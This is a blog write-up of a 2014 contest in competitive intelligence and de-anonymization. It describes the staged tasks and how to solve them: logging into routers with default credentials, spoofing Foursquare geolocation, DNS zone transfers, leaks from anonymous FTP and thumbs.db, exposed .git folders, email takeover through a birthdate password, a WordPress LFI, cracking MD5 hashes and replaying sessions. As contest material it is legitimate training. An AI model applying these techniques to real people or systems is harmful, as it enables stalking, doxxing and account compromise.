July 16, 2014

Review of Competitive Intelligence Tasks

Today we'd like to speak about certain practical aspects of confidential data gathering in terms of tasks of the online contest Competitive Intelligence, which was held during May 15, 16 and 17.


This time tasks were more difficult as compared to the last year's contest. A competitive intelligence researcher needs a great number of different skills and should be able to handle various tools and plugins. That's why we decided to make tasks more challenging. However, traditional requirements for deductive thinking and the ability to find links between data are still applicable.

1. Intro

According to the plot of the contest, a participant finds himself to be a new member of Anneximous, an underground gang. He is given a task of finding an email address of an employee at ATH:

Hi, 
I heard you wanted to join the Anneximous group. That’s fine but you should prove you’re worth it. 
Rumor has it that feds are close to us. Those dumbasses from ATH (Bureau of Alcohol, Tobacco, Hackers and Cookies) must be spying on us! 
Teach one of the agents a lesson and maybe we’ll accept you. Get his email address.
We made the first task simple so as not to scare off participants. They just needed to google it.


Solved by: 82 participants

2. Reprisal against competitors

Now the participant is assigned to gather information about hackers from World Wide Idol, who knows nothing about ethics, and to turn them over to the leaders of ATH:

You succeeded, but that task was for kiddies. The point is we have been competing with a group called World White Idol for a long time. They are exceptionally bad guys without any ethics or respect for old people. It’s time to destroy those displeasing internet maniacs! 
The plan is to expose the members of this group to ATH and we’ll be alone on the throne! 
p.s. Actually, they’ve already started to hunt us
(http://athc.biz/docs/137b60bcec2014fcedca10cc5f89bfb4.docx), so be careful and go look for these scumbags:

2.1 Catching a script kiddie in Foursquare

Nickname: Schoolkid

About: The script kiddie is hacking everything he sees, not paying attention to anonymity.

Development: Detected while hacking sites from the same IP address: 107.170.230.201.

Hint: New info came up that the hacker is connecting from a public network. Thanks to Foursquare. Who the heck is using this thing after all?

The script kiddie has been caught attacking from IP 107.170.230.201. There we can see a wireless router with the default combination (admin:admin).



It's Rodrigez's family router located at #45.647801,-84.494360 (http://107.170.230.201/?page=geo.cgi).

According to clickstream data logged in the router, there were many requests sent to Foursquare services.

In the application's requests sent to Foursquare, we change geolocation data for those data that were entered while checking in:

POST /v2/users/updatelocation HTTP/1.1
Host: api.foursquare.com
ll=45.647801,-84.494360&[…]
GET /v2/venues/search?ll=45.647801,-84.494360&[…]HTTP/1.1
Host: api.foursquare.com

Enter Rodrigez in the search field and find the place…


 


 
… and the hacker we were looking for—Antony Kiddies.

Solved by: 6 participants

Points: 15

2.2. Looking for a Japanese businessman from WWIdol

Nickname: Japanese Businessman

About: Record of conviction: ATH case #126.

Hint: ATH have a single database for the profiles of Anneximous and WWIdol. Look deeper at athc.biz. Also, check out this service for Japanese hieroglyphs recognition — http://appsv.ocrgrid.org/nhocr/.

We have a link to this "case" and we know the number of the businessman's file that we should find. Obviously, we will find something useful there.


We follow the link and find out that the hash is MD5 (“123456.7”):

https://www.google.ru/search?q=137b60bcec2014fcedca10cc5f89bfb4

The link 123456.126 with hash d39558559e10be6b4e36ca6a5a55bf79 should take us to the person we need to find; and so the document is located at:

http://athc.biz/docs/d39558559e10be6b4e36ca6a5a55bf79.docx

By the way, the task was inspired by the much-talked-of competitive intelligence case on hacking Gartner via address bar.

After opening the link at athc.biz, you will find a photo of a document. Then copy the title in the top left-hand corner of the photo, enlarge it and run through the translation service, a link to which is given in the hint, and then run it through Google Translate and see the name: Haru Sakata.




And here's what happens if you don't enlarge the image:



The task is not solved yet; the participants should still find out the businessman's birthdate and place of work.

There are four users named Haru Sakata on Twitter. The contest's organizers made up three accounts especially for the contest. Google Images can help to tell the "real" account by showing, for instance, that the particular person is a famous Japanese actor.



Solved by: 4 participants

Points: 20

2.3 Looking for a French lawyer

Nickname: Counsel

About: ATH case: http://athc.biz/docs/46a2934643bf3f80c530aee55195594d.docx.

ATH has plenty of data about this person: name, e-mail and even a piece of a photo. The original photo can be found at: zip://46a2934643bf3f80c530aee55195594d.docx/word/media/image2.emf

Things are getting clearer now: this metal thing here is not by chance, it definitely means that the person has something to do with Paris.

However, 5 participants couldn't tell the the real counsel from his twins with same photos but without any relation to Paris.



Solved by: 9 participants

Points: 20

2.4. Third-level domains and a Facebook account

Nickname: PakistaniChristian

About: Yo dawg, I heard you like subdomains, so I put three levels in yo subdomains so you can use subdomains while yo surf domains.

Hint: We got data that their domain is ftp.wwidol.com.

Hint 2: You are still looking in wrong places. Why do you think there is an e-mail?

The only thing we didn't consider in the checking mechanism was that the contest's participants (or organizers) could mix up first and last names and then none of the answers would be correct.

Though the task was quite simple: find the domain of ftp.wwidol.com (via brute-forcing or sending AXFR requests, which are allowed in the domain wwidol.com) that allows anonymous access to the FTP protocol. There's good old thumbs.db from the Windows XP age in the folder /images_upload/.


 This file contains certain thumbnails and provides names of the images that were cached by the operating system.


E-mail won't help this time, we'd better recall other de-anonymization techniques.



Having the photo of the person helps to tell the "real" accounts from fake.

Solved by: 5 participants

Points: 20

2.5. Breaking through to ATH

Nickname: johnsmith@athc.biz

Hint: We’ve managed to track the IP address of ATH which they use to access the internet. You may use this exploit to obtain the internal IP: http://net.ipcalf.com/.

Now the participants should find information about ATH's employee named John Smith. In you send an e-mail to johnsmith@athc.biz, you will receive a reply with two hints.


 The first one was that something similar to antivirus is checking all the links in emails for viruses, or maybe for some other purposes.

And the other: the router NetGear N600 is gazing at the internet, and it contains interesting vulnerabilities: http://www.exploit-db.com/exploits/32883/


What happens if we add a link to our resource to the "antivirus":


 The router with the mentioned vulnerabilities is actually located at IP 162.243.77.131. Exploitation of these vulnerabilities allows getting, say, an admin password despite HTTP 401:



This router model has more features: logo's attached to the page's footer (as many providers do today), SMB Manager, which allows access to an internal network by using Java Applet—you just need to know an IP address.




The hint shows that the IP address can be found in the footer changing form for HTML pages and by modification of the exploit given in the hint.





As a result:


We also received greetings from one of the participants. That was sweet.


Now we can try to get access to John Smith's computer and find answers on the questions:



Solved by: 2 participants

Points: 35

Note: this task as well as the following ones "produced" new tasks upon solving them.

3.1 Trying to engage a girl into a conversation at a dating site

Nickname: Stripper

About: "Talky" girl, doesn't separate private life from the job. Her probable location is #53.2054508, 63.6218262. She uses dating sites for finding clients.

Two participants found the girl on Facebook and Vkontakte.

In fact, we thought that the contest's participants would find her on Badoo first, then get her into talking and make her spill her secrets. Only one participant added her to his friends list (probably by accident), and no one tried to speak to her. And of course there were several fake accounts that confused the participants and made them choose wrong answers.




Solved by: 2 participants

Points: 30

3.2 The iPhone gives away the Indian taxi driver

Nickname: IndianTaxi-driver

About: Counsel, his brother, should know everything about him. The password for the counsel's email is ... wait … his birth day! What a freaking surprise!

To discover all about the taxi driver, the participants needed to get access to his brother's e-mail. The participants who solved the third task knew his birthdate. The driver's e-mail login and password were stored in his brother's mail,


 and here we found out that he uses Apple devices.


 The iCloud account matched the e-mail (anyway, we got access to the e-mail and could restore the data). After logging into the iCloud account, the participants just needed to detect the iPhone that the organizers "had sent" to Delhi.


Solved by: 2 participants

Points: 40

3.3. The Admin's having a little fun

Nickname: Admin

About: The admin of wwidol.com.

Google says that there's a folder /.git/ on wwidol.com, which contains an index and a config file, where we can find the admin's login for GitHub! That's a stroke of luck!


After googling the nickname we found out that the admin has two accounts on GitHub, one for work and another one just for fun. It was the second repository where the .htpasswd file could be found as well as the IP address where the file was located.



The IP address matches the site wwidol.com, which means that the admin stores other files on the WWIdol server. But on what host? If a participant issued an AXFR request by this time, he should know about host src.wwidol.com, if not then it's high time to either bruteforce the third-level domains or to issue a zone transfer request.

The password was easily guessed: it was "admin", and it was enough to get all the data about the admin in the file /about-me.txt.

Solved by: 3 participants

Points: 30

3.4. The admin and the cop are connected

Nickname: Cop

About: Admin and Cop are somehow connected. Errr, but how? Gosh..

Let's check the file src.wwidol.com/note.txt. Here we find login, password and a web camera's IP address, from which we will find out everything about the cop from a delivery invoice.


Solved by: 3 participants

Points: 20

3.4. When an anonymizer doesn't help

Nickname: ParanoidHacker

Hint: The hacker uses an anonymizer but his DNS requests absolutely don't resolve. We know for sure that during daytime the hacker is at his so called "official" job, but still doing nasty things from there. He's also running his own website that doesn't look hackproof, so you can hackproove it.

The hacker's mail is at the bottom of wwidol.com.


If we try to send him a link (as we did in task 2.5), he will follow it via an anonymizer (we mentioned it in the hint published on the third day). However, DNS queries to our resources will be sent from the hacker's resources.


These resources were located behind an office router with default accounts. admin:admin.


The router's logs showed that the hacker visited homehekkers.com, a homemade site based on a WordPress template with the installed dewplayer plugin vulnerable to LFI:



What's more, homehekkers.com and wwidol.com are hosted on the same IP address (what a coincidence!), which means that we can find out everything about the hacker from the file /tmp/dump.sql (Hello Moscow!).

Solved by: 0 participants

Points: 50

3.4. Somebody's leaking information to ATH

Nickname: rat

About: Here is the list of potential rat's accounts at the forum http://anneximous.com/rat.txt. Find me the rat!

Hint: Once upon a time there was and is Google mail. Stories were written and songs were composed 'bout Google mail remembering even the things one wouldn't suspect. And they all lived happily ever after. The question is who are "they"…?

The last task in this set was to find the rat from ATH infested in Anneximous. The participants are given lists of potential betrayers: email:md5(pass). Only one hash can be easily googled:

kevinreissen@wwidol.com:09d1d20bd495912ed5307a08510440d6 (Admin111)

wwidol.com supports mail accounts via Google Apps, which can be determined by using nslookup.


After logging in using this Gmail account, a contestant could found detailed information about an IMAP query from the device com.android.email and get the rat's IP address.


And then the contestant was able to access to the computer in the internal network and get all the necessary information using a vulnerability in ATH's router.


Solved by: 0 participants

Points: 20

4. Finishing spurt

We're coming to the end of our story about competitive intelligence researchers. The participants needed to get information about the rat from ATH settled in WWidol and about bosses of Anneximous and WWidol.

4.1. wwidolRat

Nickname: wwidolRat

About: Info: rat's report at http://athc.biz/docs/f4dd947b925ef548fcdfd66789174033.docx.

The participants were offered the rat's report. Meta tags can be used to find the IP address and to gain useful information from the computer in ATH's network once again.


Moreover, there's an archive with some data on the rat's computer, but unfortunately it's password-protected.

It turned out that the rat has its own site, but it's blocked by ATH for some reason.


If we query the IP address using domain names (kevin-donnalley.com and images.kevin-donnalley.com), we got it:


Now we're checking thumbs.db and find out the rat's base64_encode(facebook_id):



Solved by: 2 participants

Points: 20

4.2. Seizing power in the band

Nickname: Anneximous Boss

About: empty

Hint: You can use accounts 4000–4040 with the pass “phdIV @107.170.92.105”, but you still need to find boss' nickname ;)

There's a direct link to the folder with reports' images in the rat's report:



In this folder we can detect some new identifiers of reports and then try to access the reports.


Here we found a report on Anneximous and WWIdol's bosses with a password and traffic dump. We open the query:

POST /profile.php?PHPSESSID=055e9c961e311901050b261e16ef57aa HTTP/1.1
Host: anneximous.com
Cookie: PHPSESSID=055e9c961e311901050b261e16ef57aa;
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

If we repeat the query, we will know the name and SIP account of the Anneximous boss.



Solved by: 0 participants

Points: 55

4.3. Surprise

Nickname: Wwidol Boss

About: empty

The boss's SIP would seem unnecessary, cause we already got all data for filling the form. If anyone of the participants reached this task, called the boss (johanson@107.170.92.105) and examined the traffic, he or she would notice that packets started to flow through 128.199.236.23 — host boss.wwidol.com. It turned out that the bosses of Anneximous and WWIdol are the same person. What a twist in the plot!


 Now we can try to send the same query with the same password (bosses being only human like to use same passwords) to wwidol.com, and find his "nickname" on WWidol.



P. S. No one reached this task, but one of the winners managed to guess the boss's nickname using the very first report and to call him.

Solved by: 0 participants

Points: 30

The contest was finished at 7:00 pm on May 17 (it lasted three days instead of the planned two days), though some participants offered their answers after the contest was over. 301 participants registered to compete in the contest, 82 solved the intro task. Other details are available in the table below.

* Without 20 points for 2.4 task


3 comments:

  1. This comment has been removed by a blog administrator.

    ReplyDelete
  2. This comment has been removed by a blog administrator.

    ReplyDelete
  3. This comment has been removed by a blog administrator.

    ReplyDelete